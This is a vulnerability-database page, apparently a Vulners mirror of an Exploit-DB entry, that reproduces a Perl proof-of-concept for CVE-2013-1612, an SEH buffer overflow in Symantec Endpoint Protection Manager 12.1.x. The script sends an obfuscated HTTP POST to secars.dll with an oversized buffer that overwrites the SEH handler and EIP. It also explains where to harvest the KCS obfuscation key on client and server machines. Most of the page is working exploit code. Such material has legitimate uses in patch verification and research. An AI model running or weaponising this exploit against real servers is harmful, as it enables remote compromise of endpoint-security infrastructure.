Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)

🗓️ 27 Apr 2014 00:00:00Reported by st3nType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 42 Views

Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC) - Exploit Code for SEPM 12.1.x Overflo

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
27 Apr 201400:00
zdt
Tenable Nessus		Symantec Endpoint Protection Manager < 12.1 RU3 Code Execution
27 Jun 201300:00
nessus
Tenable Nessus		Symantec Endpoint Protection Manager < 12.1 RU3 (SYM13-005) (credentialed check)
19 Jun 201300:00
nessus
Check Point Advisories		Symantec Endpoint Protection Manager secars.dll Buffer Overflow (CVE-2013-1612)
25 Aug 201400:00
checkpoint_advisories
CVE		CVE-2013-1612
20 Jun 201301:00
cve
Cvelist		CVE-2013-1612
20 Jun 201301:00
cvelist
EUVD		EUVD-2013-1647
7 Oct 202500:30
euvd
exploitpack		Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)
27 Apr 201400:00
exploitpack
NVD		CVE-2013-1612
20 Jun 201303:17
nvd
OpenVAS		Symantec Endpoint Protection Manager (SEPM) Buffer Overflow Vulnerability
29 Aug 201300:00
openvas
Rows per page
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33056-sepm-secars-poc-v0.3.tar.gz

#!/usr/bin/perl -w
# Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
# Date: 31 January 2013
# Exploit Author: [email protected] (a.k.a. [email protected])
# Vendor Homepage: http://http://www.symantec.com/en/uk/endpoint-protection
# Version: 12.1.0 -> 12.1.2
# Tested on: Windows 2003 Enterprise Edition SP2
# CVE : CVE-2013-1612
# More info on: http://funoverip.net/?p=1693
#
#=====================================================================================
#
# This POC code overwrite EIP with "CCCCCCCC"
#
# About KCS Key: That key is used to obfuscate traffic between client and server.
#                The key is generated during SEPM installation.
#                We need that key to talk with the SEPM server..
#
# Where to find KCS Key ? 
# On a managed client station. Search for "Kcs" inside:
#
# - Win7/Vista/W2k8/and more : 
#    C:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\CurrentVersion\\Data\\Config\\SyLink.xml
# - Windows XP :
#    C:\\Document & Settings\\All Users\\Application Data\\Symantec\\Symantec Endpoint Protection\\
#    CurrentVersion\\Data\\Config\\SyLink.xml 
#
# On server side, check the logs:
#    C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\data\\inbox\\log\\ersecreg.log
#=====================================================================================

use warnings;
use strict;
use IO::Socket::INET;
use SEPM::SEPM;


# SEP Manager host/ip
my $host        = "192.168.60.186";
my $port	= 8014;

# Kcs key
my $Kcs_hex     = "85FB05B288B45D92447A3EDCBEFC434E";

# ---- config end -----




# flush after every write
$| = 1;


# Send HTTP request function
sub send_request {
        my $param = shift;      # URL parameters
        my $post_data = shift;  # POST DATA
        my $sock = IO::Socket::INET->new("$host:$port");
        if($sock){
                print "Connected.. \n";

                # HTTP request
                my $req =
                        "POST /secars/secars.dll?h=$param HTTP/1.0\r\n" .
                        "User-Agent: Smc\r\n" .
                        "Host: $host\r\n" .
                        "Content-Length: " . length($post_data) . "\r\n" .
                        "\r\n" .
                        $post_data ;

                # Sending
                print $sock $req;

                # Read HTTP response
                my $resp = '';
                while(<$sock>){ $resp .=$_; }

                #print $resp;   
        	if($resp =~ /400 Bad Request/) {
                	print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key ? Wrong SEP version ?\n";
                       
		}
	
		close $sock;
	}

}


# SEP object
my $sep = SEPM::SEPM->new();


print "[*] Target: $host:$port\n";
print "[*] KCS Key: $Kcs_hex\n";

# SEPM object for obfuscation
print "[*] Generating master encryption key\n";
$sep->genkey($Kcs_hex);

# Obfuscate URL parameters 
print "[*] Encrypting URI\n";
my $h = $sep->obfuscate("l=9&action=26");

# The evil buff
print "[*] Building evil buffer\n";
my $buf =
         "foo=[hex]" .   # [hex] call the vulnerable parsing function
	 "F" x 1288 .    # Junk
	 "B" x 8 .       # Pointer to next SEH record
	 "CCCCCCCC".     # SEH Handler, will overwrite EIP register	
	 "D" x 500;      # Trigger "Memory Access Violation" exception


# Sending request
print "[*] Sending HTTP request\n";
send_request($h,     # URL parameters
             $buf    # post data        
);


print "[*] Done\n";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Apr 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 27.9
EPSS0.02704
symantecendpoint protection managerseh overflowexploitwindows 2003cve-2013-1612kcs keyhttp requestobfuscationmemory access violation
42